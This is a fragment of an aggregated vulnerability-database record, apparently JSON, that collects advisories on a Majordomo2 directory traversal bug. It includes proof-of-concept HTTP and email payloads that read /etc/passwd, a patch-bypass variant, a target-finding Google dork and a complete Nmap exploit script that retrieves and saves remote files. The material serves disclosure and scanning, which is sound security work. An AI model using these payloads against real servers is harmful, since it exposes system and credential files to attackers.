\nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz \n \n \n \nReferences: \n=========== \n \nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 \nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 \nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 \n \n \n \nDisclosure Timeline (YYYY/MM/DD): \n================================= \n \n2011.02.03: Patch bypass vulnerability found \n2011.02.03: Informed security [at] mozilla.org \n2011.02.03: Mozilla opend Bug 631307 in bugzilla \n2011.02.03: Jason Tibbitts comitted a fix (Sorry again) \n2011.02.04: Snapshot available for download \n2011.02.04: Discuss the public disclosure \n2011.03.04: Got the Bug Bounty Money \n2011.03.08: Release of Advisory \n \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/99093/NSOADV-2011-003.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:24:55", "description": "", "published": "2011-02-02T00:00:00", "type": "packetstorm", "title": "Majordomo2 20110121 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0049"], "modified": "2011-02-02T00:00:00", "id": "PACKETSTORM:98116", "href": "https://packetstormsecurity.com/files/98116/Majordomo2-20110121-Directory-Traversal.html", "sourceData": "`Original Advisory: https://sitewat.ch/en/Advisory/View/1 \nCredit: Michael Brooks (https://sitewat.ch) \nVulnerability: Directory Traversal \nSoftware: Majordomo2 \nIdentifier:CVE-2011-0049 \nVendor: http://www.mj2.org/ \nAffected Build: 20110121 and prior \nDownload: \nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz \nGoogle dork:inurl:mj_wwwusr \n \nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla \nsecurity team for handling the issue. \n \nThis vulnerability is exploitable via ALL of Majordomo2's interfaces. \n*Including \ne-mail*. Send an email to majordomo's mail interface (for example: \nmajordomo@bugzilla.org) with the body of the message as follows: \nhelp ../../../../../../../../../../../../../etc/passwd \n \nI'll give you one guess as to the contents of the response email ;). \n \nPoC for HTTP: \nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/98116/majordomo2-traverse.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "description": "______________________________________________________________________\r\n-------------------------- NSOADV-2011-003 ---------------------------\r\n\r\n Majordomo2 'help' Command Directory Traversal (Patch Bypass)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: Majordomo2 'help' Command Directory Traversal\r\n Severity: Medium\r\n Advisory ID: NSOADV-2011-003\r\n CVE: CVE-2011-0063\r\n Found Date: 03.02.2011\r\n Date Reported: 03.02.2011\r\n Release Date: 19.02.2011\r\n Author: Nikolas Sotiriu\r\n Mail: nso-research at sotiriu.de\r\n Website: http://sotiriu.de/\r\n Twitter: http://twitter.com/nsoresearch\r\n Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt\r\n Vendor/Project: http://www.mj2.org/\r\n Affected Products: majordomo2 <= 20110203\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n Disclosure Policy: http://sotiriu.de/policy.html\r\n Thanks to: Thierry Zoller: For the permission to use his\r\n Policy\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo\r\nmailing list manager software by Jason Tibbitts and Michael Yount.\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nMajordomo2 <= 20110203 is affected by a Directory Traversal\r\nvulnerability due to parameter 'extra' of the 'help' command in the\r\nfunction '_list_file_get()' is not properly sanitized.\r\n\r\nThe original bug was made public on 03.02.2011 by Michael Brooks\r\nof sitewat.ch:\r\n\r\nhttps://sitewat.ch/en/Advisory/View/1\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\n\r\nI discovered, that the patch, which is in the CVS since version 20110125\r\ndon't protect against the Directory Traversal bug.\r\n\r\nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481\r\n\r\nThe diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes\r\n'../' from $file. Bypassing this regex is quiet simple by using './.../'\r\ninsted '../'.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nHTTP:\r\nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&\r\nextra=./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\nSMTP:\r\nhelp ./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nUpdate to Majordomo2 >= 20110204\r\n\r\nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz\r\n\r\n\r\n\r\nReferences:\r\n===========\r\n\r\nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1\r\nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307\r\n\r\n\r\n\r\nDisclosure Timeline (YYYY/MM/DD):\r\n=================================\r\n\r\n2011.02.03: Patch bypass vulnerability found\r\n2011.02.03: Informed security [at] mozilla.org\r\n2011.02.03: Mozilla opend Bug 631307 in bugzilla\r\n2011.02.03: Jason Tibbitts comitted a fix (Sorry again)\r\n2011.02.04: Snapshot available for download\r\n2011.02.04: Discuss the public disclosure\r\n2011.03.04: Got the Bug Bounty Money\r\n2011.03.08: Release of Advisory\r\n\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2011-03-10T00:00:00", "title": "NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-10T00:00:00", "id": "SECURITYVULNS:DOC:25895", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25895", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0049"], "description": "Directory traversal on help command processing via e-mail or Web.", "edition": 1, "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:VULN:11397", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11397", "title": "Majordomo2 directory traversal", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2011-0049"], "description": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\n \r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla security\r\nteam for handling the issue.\r\n \r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces. *Including\r\ne-mail*. Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n \r\nI'll give you one guess as to the contents of the response email ;).\r\n \r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "edition": 1, "modified": "2011-02-03T00:00:00", "published": "2011-02-03T00:00:00", "id": "SECURITYVULNS:DOC:25607", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25607", "title": "Majordomo2 - Directory Traversal (SMTP/HTTP)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2021-09-28T17:50:57", "description": "### Overview\n\nMajordomo 2 contains a directory traversal vulnerability in the `_list_file_get()`function, which may allow a remote, unauthenticated attacker to obtain sensitive information.\n\n### Description\n\nMajordomo 2 contains a directory traversal vulnerability in the `_list_file_get()`function (lib/Majordomo.pm) caused by an input validation error when handling files. An attacker can exploit this vulnerability via directory traversal specifiers sent in a specially crafted request to any of the application's interfaces (e.g. email or web). \n\n\nAdditional information regarding this vulnerability can be found in this [Sitewatch Advisory](<https://sitewat.ch/en/Advisory/View/1>). \n \n--- \n \n### Impact\n\nA remote unauthenticated attacker could obtain sensitive information. \n \n--- \n \n### Solution\n\n**Update** \nMajordomo 2 recommends users update to snapshot [20110204](<http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz>) or later. \n \n--- \n \n### Vendor Information\n\nThe vulnerability is reported in snapshots prior to 20110204. \n \n--- \n \n363726\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Majordomo 2 Affected\n\nUpdated: February 04, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.mj2.org/pub/mj2/snapshots/2011-02/>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.us-cert.gov/current/index.html#majordomo_vulnerable_to_directory_traversal>\n * <https://sitewat.ch/en/Advisory/View/1>\n * <http://ftp.mj2.org/pub/mj2/snapshots/2011-02/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Michael Brooks.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2011-0049](<http://web.nvd.nist.gov/vuln/detail/CVE-2011-0049>) \n---|--- \n**Severity Metric:** | 25.20 \n**Date Public:** | 2011-02-04 \n**Date First Published:** | 2011-02-04 \n**Date Last Updated: ** | 2011-03-28 12:27 UTC \n**Document Revision: ** | 22 \n", "cvss3": {}, "published": "2011-02-04T00:00:00", "type": "cert", "title": "Majordomo 2 _list_file_get() directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2011-03-28T12:27:00", "id": "VU:363726", "href": "https://www.kb.cert.org/vuls/id/363726", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T13:36:24", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Majordomo2 - Directory Traversal (SMTP/HTTP)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0049"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70661", "id": "SSV:70661", "sourceData": "\n Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\nGoogle dork:inurl:mj_wwwusr\r\n\r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\r\nsecurity team for handling the issue.\r\n\r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\r\n*Including\r\ne-mail*. Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n\r\nI'll give you one guess as to the contents of the response email ;).\r\n\r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70661"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMajordomo2 - SMTPHTTP Directory Traversal", "edition": 2, "published": "2011-02-03T00:00:00", "title": "Majordomo2 - SMTPHTTP Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2011-02-03T00:00:00", "id": "EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365", "href": "", "sourceData": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\nCredit: Michael Brooks (https://sitewat.ch)\nVulnerability: Directory Traversal\nSoftware: Majordomo2\nIdentifier:CVE-2011-0049\nVendor: http://www.mj2.org/\nAffected Build: 20110121 and prior\nGoogle dork:inurl:mj_wwwusr\n\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\nsecurity team for handling the issue.\n\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\n*Including\ne-mail*. Send an email to majordomo's mail interface (for example:\nmajordomo@bugzilla.org) with the body of the message as follows:\nhelp ../../../../../../../../../../../../../etc/passwd\n\nI'll give you one guess as to the contents of the response email ;).\n\nPoC for HTTP:\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-08-16T09:13:17", "description": "", "cvss3": {}, "published": "2011-02-03T00:00:00", "type": "exploitdb", "title": "Majordomo2 - 'SMTP/HTTP' Directory Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2011-0049", "2011-0063", "CVE-2011-0049"], "modified": "2011-02-03T00:00:00", "id": "EDB-ID:16103", "href": "https://www.exploit-db.com/exploits/16103", "sourceData": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\nGoogle dork:inurl:mj_wwwusr\r\n\r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\r\nsecurity team for handling the issue.\r\n\r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\r\n*Including\r\ne-mail*. Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n\r\nI'll give you one guess as to the contents of the response email ;).\r\n\r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "sourceHref": "https://www.exploit-db.com/download/16103", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2022-02-15T21:43:25", "description": "Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049). \n\nVulnerability originally discovered by Michael Brooks. \n\nFor more information about this vulnerability: \n\n * <http://www.mj2.org/>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049>\n * <http://www.exploit-db.com/exploits/16103/>\n\n## Script Arguments \n\n#### http-majordomo2-dir-traversal.rfile \n\nRemote file to download. Default: /etc/passwd\n\n#### http-majordomo2-dir-traversal.uri \n\nURI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n\n#### http-majordomo2-dir-traversal.outfile \n\nIf set it saves the remote file to this location. \n\nOther arguments you might want to use with this script: \n\n * http.useragent - Sets user agent\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http syn-ack\n | http-majordomo2-dir-traversal: /etc/passwd was found:\n |\n | root:x:0:0:root:/root:/bin/bash\n | bin:x:1:1:bin:/bin:/sbin/nologin\n |\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-27T20:22:25", "type": "nmap", "title": "http-majordomo2-dir-traversal NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE", "href": "https://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).\n\nVulnerability originally discovered by Michael Brooks.\n\nFor more information about this vulnerability:\n* http://www.mj2.org/\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049\n* http://www.exploit-db.com/exploits/16103/\n]]\n\n---\n-- @usage\n-- nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http syn-ack\n-- | http-majordomo2-dir-traversal: /etc/passwd was found:\n-- |\n-- | root:x:0:0:root:/root:/bin/bash\n-- | bin:x:1:1:bin:/bin:/sbin/nologin\n-- |\n--\n-- @args http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd\n-- @args http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n-- @args http-majordomo2-dir-traversal.outfile If set it saves the remote file to this location.\n--\n-- Other arguments you might want to use with this script:\n-- * http.useragent - Sets user agent\n--\n\nauthor = \"Paulino Calderon <calderon@websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\", \"exploit\"}\n\n\nportrule = shortport.http\n\nlocal MAJORDOMO2_EXPLOIT_QRY = \"?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../..\"\nlocal MAJORDOMO2_EXPLOIT_URI = \"/cgi-bin/mj_wwwusr\"\nlocal DEFAULT_REMOTE_FILE = \"/etc/passwd\"\n\n---\n--Writes string to file\n--Taken from: hostmap.nse\nlocal function write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n\n---\n-- MAIN\n---\naction = function(host, port)\n local response, rfile, rpath, uri, evil_uri, rfile_content, filewrite\n local output_lines = {}\n\n filewrite = stdnse.get_script_args(\"http-majordomo2-dir-traversal.outfile\")\n uri = stdnse.get_script_args(\"http-majordomo2-dir-traversal.uri\") or MAJORDOMO2_EXPLOIT_URI\n rfile = stdnse.get_script_args(\"http-majordomo2-dir-traversal.rfile\") or DEFAULT_REMOTE_FILE\n evil_uri = uri..MAJORDOMO2_EXPLOIT_QRY..rfile\n\n stdnse.debug1(\"HTTP GET %s%s\", stdnse.get_hostname(host), evil_uri)\n response = http.get(host, port, evil_uri)\n if response.body and response.status==200 then\n if response.body:match(\"unknowntopic\") then\n stdnse.debug1(\"[Error] The server is not vulnerable, '%s' was not found or the web server has insufficient permissions to read it\", rfile)\n return\n end\n local _\n _, _, rfile_content = string.find(response.body, '<pre>(.*)<!%-%- Majordomo help_foot format file %-%->')\n output_lines[#output_lines+1] = rfile..\" was found:\\n\"..rfile_content\n if filewrite then\n local status, err = write_file(filewrite, rfile_content)\n if status then\n output_lines[#output_lines+1] = string.format(\"%s saved to %s\\n\", rfile, filewrite)\n else\n output_lines[#output_lines+1] = string.format(\"Error saving %s to %s: %s\\n\", rfile, filewrite, err)\n end\n end\n return table.concat(output_lines, \"\\n\")\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Majordomo 2 File Disclosure

Description

Related